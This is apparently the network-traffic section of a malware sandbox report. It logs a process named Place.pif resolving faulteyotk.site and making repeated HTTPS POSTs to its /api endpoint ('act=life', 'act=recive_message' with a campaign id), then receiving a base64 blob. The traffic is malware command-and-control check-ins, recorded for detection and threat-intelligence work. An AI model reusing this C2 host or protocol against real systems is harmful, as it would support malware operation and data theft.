Oct 28, 2024 14:07:54.440242052 CET	49901	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:54.445327044 CET	49901	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:54.445342064 CET	443	49901	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:54.445784092 CET	443	49901	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:54.496257067 CET	49901	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:54.541853905 CET	49901	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:54.541884899 CET	49901	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:54.542149067 CET	443	49901	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:55.011352062 CET	443	49901	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:55.011610031 CET	443	49901	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:55.011723042 CET	49901	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:55.013556957 CET	49901	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:55.013573885 CET	443	49901	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:55.013587952 CET	49901	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:55.013602018 CET	443	49901	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:55.086843967 CET	49911	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:55.086883068 CET	443	49911	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:55.086970091 CET	49911	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:55.089342117 CET	49911	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:55.089354038 CET	443	49911	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:55.716079950 CET	443	49911	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:55.716206074 CET	49911	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:55.725598097 CET	49911	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:55.725617886 CET	443	49911	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:55.726665020 CET	443	49911	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:55.739466906 CET	49911	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:55.739492893 CET	49911	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:55.739572048 CET	443	49911	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:56.227778912 CET	443	49911	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:56.227837086 CET	443	49911	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:56.227879047 CET	443	49911	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:56.227893114 CET	49911	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:56.227919102 CET	443	49911	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:56.227957964 CET	49911	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:56.227963924 CET	443	49911	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:56.228312969 CET	443	49911	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:56.228357077 CET	443	49911	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:56.228357077 CET	49911	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:56.228373051 CET	443	49911	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:56.228419065 CET	49911	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:56.228424072 CET	443	49911	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:56.277421951 CET	49911	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:56.277441978 CET	443	49911	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:56.324322939 CET	49911	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:56.346538067 CET	443	49911	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:56.347440004 CET	443	49911	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:56.347480059 CET	443	49911	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:56.347518921 CET	49911	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:56.347522974 CET	443	49911	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:56.347533941 CET	443	49911	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:56.347573996 CET	49911	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:56.347588062 CET	443	49911	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:56.347623110 CET	443	49911	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:56.347630978 CET	49911	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:56.347667933 CET	49911	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:56.347877026 CET	49911	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:56.347893000 CET	443	49911	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:56.347910881 CET	49911	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:56.347914934 CET	443	49911	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:56.507457972 CET	49917	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:56.507530928 CET	443	49917	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:56.507626057 CET	49917	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:56.508060932 CET	49917	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:56.508094072 CET	443	49917	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:57.119430065 CET	443	49917	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:57.119607925 CET	49917	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:57.120919943 CET	49917	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:57.120934010 CET	443	49917	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:57.121140957 CET	443	49917	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:57.122550964 CET	49917	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:57.122675896 CET	49917	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:57.122697115 CET	443	49917	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:57.754956007 CET	443	49917	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:57.755033970 CET	443	49917	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:57.755110979 CET	49917	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:57.755327940 CET	49917	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:57.755372047 CET	443	49917	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:57.884066105 CET	49928	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:57.884125948 CET	443	49928	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:57.884219885 CET	49928	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:57.884640932 CET	49928	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:57.884671926 CET	443	49928	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:58.495209932 CET	443	49928	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:58.495284081 CET	49928	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:58.500514030 CET	49928	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:58.500544071 CET	443	49928	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:58.500838995 CET	443	49928	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:58.502443075 CET	49928	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:58.502576113 CET	49928	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:58.502619028 CET	443	49928	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:58.502681971 CET	49928	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:58.502696037 CET	443	49928	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:59.028548956 CET	443	49928	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:59.028647900 CET	443	49928	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:59.028853893 CET	49928	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:59.028911114 CET	49928	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:59.291939974 CET	49936	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:59.291970968 CET	443	49936	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:59.292062044 CET	49936	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:59.292474031 CET	49936	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:59.292481899 CET	443	49936	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:59.904684067 CET	443	49936	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:59.904824972 CET	49936	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:59.913420916 CET	49936	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:59.913428068 CET	443	49936	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:59.913702965 CET	443	49936	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:59.915641069 CET	49936	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:59.915844917 CET	49936	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:59.915889025 CET	443	49936	104.21.9.13	192.168.2.5
Oct 28, 2024 14:07:59.919068098 CET	49936	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:07:59.919076920 CET	443	49936	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:00.492729902 CET	443	49936	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:00.492980957 CET	443	49936	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:00.493050098 CET	49936	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:00.493156910 CET	49936	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:00.493164062 CET	443	49936	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:00.674427986 CET	49946	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:00.674479961 CET	443	49946	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:00.674570084 CET	49946	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:00.675277948 CET	49946	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:00.675293922 CET	443	49946	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:01.281728983 CET	443	49946	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:01.281800985 CET	49946	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:01.283809900 CET	49946	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:01.283823013 CET	443	49946	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:01.284034967 CET	443	49946	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:01.285564899 CET	49946	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:01.285650015 CET	49946	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:01.285659075 CET	443	49946	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:01.810622931 CET	443	49946	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:01.810714960 CET	443	49946	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:01.810898066 CET	49946	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:01.810986996 CET	49946	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:01.811008930 CET	443	49946	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:02.248441935 CET	49956	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:02.248456955 CET	443	49956	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:02.248553038 CET	49956	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:02.248830080 CET	49956	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:02.248842001 CET	443	49956	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:02.874886990 CET	443	49956	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:02.874979019 CET	49956	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:02.882715940 CET	49956	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:02.882742882 CET	443	49956	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:02.882982969 CET	443	49956	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:02.887691021 CET	49956	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:02.889929056 CET	49956	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:02.889988899 CET	443	49956	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:02.890122890 CET	49956	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:02.890160084 CET	443	49956	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:02.890280008 CET	49956	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:02.890405893 CET	443	49956	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:02.890558004 CET	49956	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:02.890584946 CET	443	49956	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:02.890752077 CET	49956	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:02.890794992 CET	443	49956	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:02.890964031 CET	49956	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:02.891000032 CET	443	49956	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:02.891012907 CET	49956	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:02.891043901 CET	443	49956	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:02.891220093 CET	49956	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:02.891284943 CET	49956	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:02.901669025 CET	443	49956	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:02.901956081 CET	49956	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:02.902014971 CET	443	49956	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:02.902028084 CET	49956	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:02.902050972 CET	49956	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:02.902185917 CET	443	49956	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:02.902220964 CET	49956	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:02.902251959 CET	49956	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:02.902275085 CET	443	49956	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:02.902331114 CET	49956	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:02.902370930 CET	443	49956	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:04.695743084 CET	443	49956	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:04.695849895 CET	443	49956	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:04.695930004 CET	49956	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:04.696080923 CET	49956	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:04.696115971 CET	443	49956	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:04.704565048 CET	49969	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:04.704611063 CET	443	49969	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:04.704771042 CET	49969	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:04.705001116 CET	49969	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:04.705017090 CET	443	49969	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:05.304234028 CET	443	49969	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:05.304316998 CET	49969	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:05.320111036 CET	49969	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:05.320133924 CET	443	49969	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:05.320420027 CET	443	49969	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:05.325217009 CET	49969	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:05.325256109 CET	49969	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:05.325294971 CET	443	49969	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:05.859446049 CET	443	49969	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:05.859568119 CET	443	49969	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:05.859638929 CET	49969	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:05.859865904 CET	49969	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:05.859891891 CET	443	49969	104.21.9.13	192.168.2.5
Oct 28, 2024 14:08:05.859908104 CET	49969	443	192.168.2.5	104.21.9.13
Oct 28, 2024 14:08:05.859915018 CET	443	49969	104.21.9.13	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 28, 2024 14:07:08.017683029 CET	51040	53	192.168.2.5	1.1.1.1
Oct 28, 2024 14:07:08.033397913 CET	53	51040	1.1.1.1	192.168.2.5
Oct 28, 2024 14:07:53.777754068 CET	58067	53	192.168.2.5	1.1.1.1
Oct 28, 2024 14:07:53.787712097 CET	53	58067	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 28, 2024 14:07:08.017683029 CET	192.168.2.5	1.1.1.1	0xc342	Standard query (0)	XoihaBktBfpQRsABjqvzDOKOlj.XoihaBktBfpQRsABjqvzDOKOlj	A (IP address)	IN (0x0001)	false
Oct 28, 2024 14:07:53.777754068 CET	192.168.2.5	1.1.1.1	0x1088	Standard query (0)	faulteyotk.site	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 28, 2024 14:07:08.033397913 CET	1.1.1.1	192.168.2.5	0xc342	Name error (3)	XoihaBktBfpQRsABjqvzDOKOlj.XoihaBktBfpQRsABjqvzDOKOlj	none	none	A (IP address)	IN (0x0001)	false
Oct 28, 2024 14:07:53.787712097 CET	1.1.1.1	192.168.2.5	0x1088	No error (0)	faulteyotk.site		104.21.9.13	A (IP address)	IN (0x0001)	false
Oct 28, 2024 14:07:53.787712097 CET	1.1.1.1	192.168.2.5	0x1088	No error (0)	faulteyotk.site		172.67.188.223	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

faulteyotk.site

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49901	104.21.9.13	443	7132	C:\Users\user\AppData\Local\Temp\756341\Place.pif

Timestamp	Bytes transferred	Direction	Data
2024-10-28 13:07:54 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: faulteyotk.site
2024-10-28 13:07:54 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-28 13:07:55 UTC	1009	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 13:07:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5o82oodmiqrqacm8p3rc9u3rsp; expires=Fri, 21 Feb 2025 06:54:33 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1vyGNH9tUWkZFkwG2S54iVVgb%2BHzXMSqv6V4eUwB1n47PZvE6LPUyXVGIHYsOUoJDcZy97YJf66kUxBlFZzCBVYcabyNf%2ByE6LBYLdTmXqXfAdQL4lLSZm7%2BNSIfG4TljA0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9b26ca59af283f-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1366&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=2045197&cwnd=236&unsent_bytes=0&cid=dfd91526a82dd822&ts=590&x=0"
2024-10-28 13:07:55 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-10-28 13:07:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49911	104.21.9.13	443	7132	C:\Users\user\AppData\Local\Temp\756341\Place.pif

Timestamp	Bytes transferred	Direction	Data
2024-10-28 13:07:55 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 48 Host: faulteyotk.site
2024-10-28 13:07:55 UTC	48	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 49 52 69 61 46 69 2d 2d 32 38 31 30 6d 72 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=IRiaFi--2810mr&j=
2024-10-28 13:07:56 UTC	1011	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 13:07:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7cgiusr7e61k49k2ar3l95oo12; expires=Fri, 21 Feb 2025 06:54:35 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MUACqsrCd%2FmSztWUS%2BZFIff1SUzU9foH5O4b3CtngABWmdCz8n%2FW2wTC6o3xT47KwyBL189Si9sURX5ho1cdoaRprJh8eph7ESfc5x%2BLUVyHv7DyHsxh4ZNBVmGBFsN9cRc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9b26d1ce69e8fd-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1972&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=947&delivery_rate=1453815&cwnd=251&unsent_bytes=0&cid=72d78e8dff6ce1f4&ts=525&x=0"
2024-10-28 13:07:56 UTC	358	IN	Data Raw: 32 35 61 31 0d 0a 76 41 4d 7a 4f 4f 4b 72 46 41 42 31 2f 47 43 5a 50 53 36 33 63 43 44 2b 38 4a 72 41 45 30 54 63 43 7a 77 56 71 2f 5a 37 65 51 50 48 49 55 55 61 32 4a 38 34 49 67 61 5a 51 71 4e 4a 58 4d 49 56 44 4e 79 52 2f 75 49 70 49 72 31 6e 54 33 43 48 31 41 30 55 49 59 5a 6c 55 6c 53 52 7a 6a 67 69 45 49 52 43 6f 32 5a 56 6c 52 56 4f 33 4d 71 34 70 58 6b 6d 76 57 64 65 64 4d 43 5a 43 78 56 67 31 47 39 55 55 49 66 49 63 47 45 5a 6b 51 58 38 57 45 2f 64 48 6b 6d 54 6d 50 66 69 50 32 61 35 63 52 34 76 69 62 73 65 44 57 4c 78 59 6b 42 54 77 4e 59 34 65 31 65 5a 44 72 73 48 44 4e 59 56 51 70 4b 57 2f 71 74 37 4c 4c 52 76 58 33 48 42 68 68 49 66 61 39 52 68 56 31 47 4e 77 57 52 73 45 35 59 4f 2b 6c 4a 50 6c 56 77 43 6d 34 71 34 2b 6a 46 31 6a 47 70 50 5a Data Ascii: 25a1vAMzOOKrFAB1/GCZPS63cCD+8JrAE0TcCzwVq/Z7eQPHIUUa2J84IgaZQqNJXMIVDNyR/uIpIr1nT3CH1A0UIYZlUlSRzjgiEIRCo2ZVlRVO3Mq4pXkmvWdedMCZCxVg1G9UUIfIcGEZkQX8WE/dHkmTmPfiP2a5cR4vibseDWLxYkBTwNY4e1eZDrsHDNYVQpKW/qt7LLRvX3HBhhIfa9RhV1GNwWRsE5YO+lJPlVwCm4q4+jF1jGpPZ
2024-10-28 13:07:56 UTC	1369	IN	Data Raw: 48 35 55 4a 2f 6b 31 48 33 42 39 50 6e 4a 2f 79 72 58 49 6d 75 57 4e 55 65 4d 4f 51 46 42 5a 6e 33 6d 45 52 46 4d 44 4f 62 69 4a 50 33 69 48 2b 54 30 76 5a 42 41 43 6d 30 75 66 73 61 47 61 35 5a 52 34 76 69 5a 77 63 47 47 4c 56 62 6c 4a 53 69 39 74 32 63 42 47 54 42 2b 6c 5a 53 64 73 59 51 59 36 59 39 71 52 79 4c 37 56 67 57 33 44 4e 31 46 64 62 5a 73 59 68 43 52 71 68 78 48 31 75 48 59 6b 43 75 30 41 43 7a 46 4a 46 6b 4e 4b 67 34 6e 55 6e 75 6d 68 61 65 63 65 51 46 52 31 76 30 32 35 58 55 49 44 4f 66 47 6f 66 6e 77 2f 77 55 45 7a 51 48 30 61 61 6e 76 6d 6e 4d 57 6a 2b 62 6b 59 33 6b 64 51 33 48 47 4c 4d 49 32 52 5a 6a 73 64 78 64 46 65 42 54 4f 49 66 53 39 6c 53 47 74 79 63 2f 61 31 6a 4a 36 78 73 55 47 58 46 6b 52 38 57 59 74 42 68 56 46 32 4e 78 33 42 Data Ascii: H5UJ/k1H3B9PnJ/yrXImuWNUeMOQFBZn3mERFMDObiJP3iH+T0vZBACm0ufsaGa5ZR4viZwcGGLVblJSi9t2cBGTB+lZSdsYQY6Y9qRyL7VgW3DN1FdbZsYhCRqhxH1uHYkCu0ACzFJFkNKg4nUnumhaeceQFR1v025XUIDOfGofnw/wUEzQH0aanvmnMWj+bkY3kdQ3HGLMI2RZjsdxdFeBTOIfS9lSGtyc/a1jJ6xsUGXFkR8WYtBhVF2Nx3B
2024-10-28 13:07:56 UTC	1369	IN	Data Raw: 4f 49 66 53 39 6c 53 47 74 79 65 38 61 4a 36 4c 4c 70 70 57 58 72 4d 6c 78 34 59 62 4e 6c 72 58 31 32 45 78 58 39 76 45 5a 34 46 2f 31 70 65 30 42 74 4f 6b 4e 4b 32 34 6e 59 2b 2f 6a 45 65 57 4d 36 43 47 6a 52 69 7a 32 67 52 52 63 37 51 4e 6d 55 62 33 6c 71 37 57 45 6e 64 47 55 53 55 6b 75 71 6e 66 79 32 2f 59 31 68 32 78 4a 67 66 47 32 44 65 5a 31 31 61 68 38 35 6b 63 42 4b 59 45 50 45 66 41 70 55 56 57 74 7a 4b 75 4a 52 68 4d 61 39 2f 48 45 4c 4b 6d 68 63 63 64 35 35 2b 48 30 50 41 7a 6e 6f 69 54 39 34 4a 2b 31 4e 4c 33 52 52 47 6c 4a 33 33 71 32 4d 6e 73 6d 64 4d 63 4d 6d 64 46 78 52 74 31 32 78 57 56 34 76 44 65 32 59 51 6e 30 4b 31 48 30 76 4e 55 68 72 63 70 4f 69 76 66 51 69 31 5a 56 63 33 31 74 6f 41 57 32 62 53 49 51 6b 61 68 4d 56 2b 61 42 69 58 Data Ascii: OIfS9lSGtye8aJ6LLppWXrMlx4YbNlrX12ExX9vEZ4F/1pe0BtOkNK24nY+/jEeWM6CGjRiz2gRRc7QNmUb3lq7WEndGUSUkuqnfy2/Y1h2xJgfG2DeZ11ah85kcBKYEPEfApUVWtzKuJRhMa9/HELKmhccd55+H0PAznoiT94J+1NL3RRGlJ33q2MnsmdMcMmdFxRt12xWV4vDe2YQn0K1H0vNUhrcpOivfQi1ZVc31toAW2bSIQkahMV+aBiX
2024-10-28 13:07:56 UTC	1369	IN	Data Raw: 76 52 46 45 33 63 33 4c 69 6c 61 57 62 6d 4b 58 46 51 2f 4e 59 34 49 53 48 42 4c 30 67 61 68 38 55 32 4f 6c 65 53 41 66 64 58 51 39 4d 62 54 70 61 62 38 36 35 36 49 72 4a 67 57 33 48 49 6b 52 77 61 5a 64 4a 72 56 31 6d 44 78 6e 6c 74 48 39 35 4d 75 31 68 55 6c 55 6f 43 75 59 58 7a 72 48 64 6d 6f 53 64 48 4e 38 36 59 57 55 4d 68 30 6d 68 58 58 49 58 46 64 32 51 66 6d 77 72 2f 58 6b 72 54 45 55 32 59 6c 2f 6d 74 64 53 71 77 59 31 39 32 78 5a 38 57 45 47 53 65 4c 78 46 64 6d 49 6b 75 49 69 61 64 46 4f 78 50 51 4a 55 4e 44 49 58 53 2f 36 34 78 66 76 35 6f 54 48 33 44 6d 68 77 55 5a 4e 31 75 56 6c 65 47 78 58 78 72 48 35 67 4e 38 6b 31 50 32 52 78 46 6b 70 37 32 72 33 73 6c 73 79 6b 51 4e 38 36 4d 57 55 4d 68 38 6d 5a 63 64 49 76 46 63 53 49 49 30 42 75 37 57 Data Ascii: 